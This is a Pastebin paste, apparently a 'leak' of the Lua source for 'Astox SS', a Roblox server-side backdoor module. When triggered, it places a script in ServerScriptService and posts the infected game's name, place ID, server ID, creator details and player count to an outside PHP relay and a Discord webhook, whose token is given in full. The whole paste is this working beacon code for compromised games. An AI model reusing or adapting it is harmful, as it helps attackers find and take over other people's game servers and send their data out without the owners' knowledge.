Advertisement
Guest User

astrox ss leak [dogie#0001]

a guest
Jun 27th, 2019
774
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.59 KB | None | 0 0
  1. --[[
  2.  
  3. Yay you got the source :)
  4.  
  5.  
  6.  
  7. ]]
  8.  
  9.  
  10.  
  11. local module = {}
  12.  
  13. function module:RUN(module_key)
  14. function getISO8601(T)
  15. local t=os.date('!*t',T or os.time())
  16. return string.format(
  17. '%04d-%02d-%02dT%02d:%02d:%02dZ',
  18. t.year,t.month,t.day,t.hour,t.min,t.sec)
  19. end
  20. mark = game:GetService("MarketplaceService")
  21.  
  22. nameo = mark:GetProductInfo(game.PlaceId).Name
  23.  
  24. local creatortype = string.sub(tostring(game.CreatorType),18)
  25.  
  26.  
  27. local sId=#game.JobId>0 and
  28. tostring(game.JobId)or'TEST'
  29.  
  30.  
  31. local http = game:GetService('HttpService')
  32.  
  33. local embed = {
  34. title="Astox SS";
  35. description="Backdoor Detected";
  36. url="https://roblox.com/games/"..game.PlaceId.."/";
  37. --[test](http://google.com/)";
  38. color=0xFFB3CF;
  39. fields={
  40. [1]={
  41. name="Game Name";
  42. value=tostring(nameo);
  43. inline=true;
  44. };
  45. [2]={
  46. name="Game ID";
  47. value=tostring(game.PlaceId);
  48. inline=true;
  49. };
  50. [3]={
  51. name="Game link";
  52. value="[Click here](https://roblox.com/games/"..game.PlaceId.."/)";
  53. inline=true;
  54. };
  55. [4]={
  56. name="Server ID";
  57. value=sId;
  58. inline=true;
  59. };
  60. [5]={
  61. name="Creator Type";
  62. value=creatortype;
  63. inline=false;
  64. };
  65. [6]={
  66. name="Creator ID";
  67. value=tostring(game.CreatorId);
  68. inline=true
  69. };
  70. };
  71. thumbnail={
  72. url="http://www.roblox.com/Thumbs/Asset.ashx?format=png&width=420&height=230&assetId="..game.PlaceId.."";
  73. height=256;
  74. width=256;
  75. };
  76. timestamp=getISO8601(tick());
  77. footer={
  78. ["text"]="astolgic#0081";
  79. ["icon_url"]="http://c1.rbxcdn.com/945be18871f49ce4e54d734f1a779e4a";
  80. };
  81. };
  82.  
  83.  
  84.  
  85.  
  86.  
  87.  
  88. if creatortype == "User" then
  89.  
  90. embed.fields[#embed.fields+1]={
  91. name="Creator Name";
  92. value=tostring(game.Players:GetNameFromUserIdAsync(game.CreatorId));
  93. inline=true;
  94. };
  95.  
  96. end
  97. embed.fields[#embed.fields+1]={
  98. name="Current Players";
  99. value=""..tostring(#game.Players:GetPlayers()).."/"..game.Players.MaxPlayers.."";
  100. inline=false;
  101. };
  102.  
  103.  
  104. local Data = {
  105. ["embeds"] = {embed};
  106. ["webhook"] = 'https://discordapp.com/api/webhooks/566802244968906752/MMizFWD9VidNOd0kX-5WtWVuCE9WiEN6YOnefiKjwOcin12WO8WSQg80paA6sHWVtJoB';
  107. ["category"]=4; -- this opts you out of our internal logging services.
  108. };
  109.  
  110. function start()
  111.  
  112. script.Script.Parent = game:GetService("ServerScriptService")
  113. Data = http:JSONEncode(Data)
  114. http:PostAsync('http://le-blog.webutu.com/discordWebhook.php', Data)
  115.  
  116. end
  117.  
  118.  
  119.  
  120.  
  121. if module_key == "Load_Settings" then
  122. start()
  123.  
  124. print("Make Sure http requests are Enabled!")
  125. end
  126. end
  127.  
  128. return module
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement